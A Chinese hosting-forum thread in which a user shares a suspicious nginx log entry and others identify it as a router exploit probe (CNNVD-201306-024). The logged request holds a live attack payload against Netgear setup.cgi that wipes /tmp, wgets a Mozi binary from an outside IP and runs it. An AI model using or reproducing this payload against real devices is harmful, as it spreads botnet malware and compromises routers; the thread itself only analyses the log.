全球灰产交流论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

全球云38元起免备案V2EX搬瓦工灰产
SEO查询超级PING网站测速
Virmach特价鸡乌云漏洞吾爱破解
查看: 169|回复: 9

nginx 莫名奇妙的日志,请大家分析一下。

[复制链接]

67

主题

127

回帖

555

积分

高级会员

Rank: 4

积分
555
发表于 2024-9-8 12:25:17 | 显示全部楼层 |阅读模式
20230417
系统是刚装几天的,就装了 nginx 反代一个docker容器,不是80端口

但是nginx就老发现一些奇怪的日志。

比如下面这个。居然还有 “rm+-rf”  这种命令


117.253.56.151 - - [08/Sep/2024:02:59:55 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.219.161.81:50626/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 146 "-" "-" "-"
hostloc邀请码购买+tg:@Sendtoae86bot
回复

使用道具 举报

32

主题

1347

回帖

3898

积分

论坛元老

Rank: 8Rank: 8

积分
3898
发表于 2024-9-8 12:44:00 | 显示全部楼层
调查员 发表于 2024-9-8 12:28
不会吧,用访问不存在网页的方式,也能试漏洞?

他不访问怎么知道不存在?
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

27

主题

331

回帖

1049

积分

金牌会员

Rank: 6Rank: 6

积分
1049
发表于 2024-9-8 12:28:00 | 显示全部楼层
别人在试漏洞,执行命令
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

67

主题

127

回帖

555

积分

高级会员

Rank: 4

积分
555
 楼主| 发表于 2024-9-8 12:26:42 | 显示全部楼层
loverhoc 发表于 2024-9-8 12:26
别人在试漏洞,执行命令

不会吧,用访问不存在网页的方式,也能试漏洞?
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

10

主题

472

回帖

1456

积分

金牌会员

Rank: 6Rank: 6

积分
1456
发表于 2024-9-8 12:28:10 | 显示全部楼层
这是一个针对路由器的漏洞CNNVD-201306-024
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

67

主题

127

回帖

555

积分

高级会员

Rank: 4

积分
555
 楼主| 发表于 2024-9-8 12:26:00 | 显示全部楼层
wps 发表于 2024-9-8 12:30
这是一个针对路由器的漏洞CNNVD-201306-024

看来大家的路由器,80端口真的不要轻易打开。
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

67

主题

127

回帖

555

积分

高级会员

Rank: 4

积分
555
 楼主| 发表于 2024-9-8 12:30:17 | 显示全部楼层
印度人在干坏事。
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

3

主题

2992

回帖

6423

积分

论坛元老

Rank: 8Rank: 8

积分
6423
发表于 2024-9-8 12:31:26 | 显示全部楼层
看这些你不是不是觉得太无聊了?
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

1

主题

98

回帖

349

积分

中级会员

Rank: 3Rank: 3

积分
349
发表于 2024-9-8 12:30:00 | 显示全部楼层
loc 竟然真有萌新
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

5

主题

233

回帖

851

积分

高级会员

Rank: 4

积分
851
发表于 2024-9-8 12:35:14 | 显示全部楼层
调查员 发表于 2024-9-8 12:28
不会吧,用访问不存在网页的方式,也能试漏洞?

访问到了说明存在,访问不到说明不存在,就这么一个一个试
hostloc邀请码购买+tg:@Sendtoae86bot
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

展开

QQ|Archiver|手机版|小黑屋|全球灰产交流论坛

GMT+8, 2024-11-2 14:17 , Processed in 0.045607 second(s), 26 queries , Gzip On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表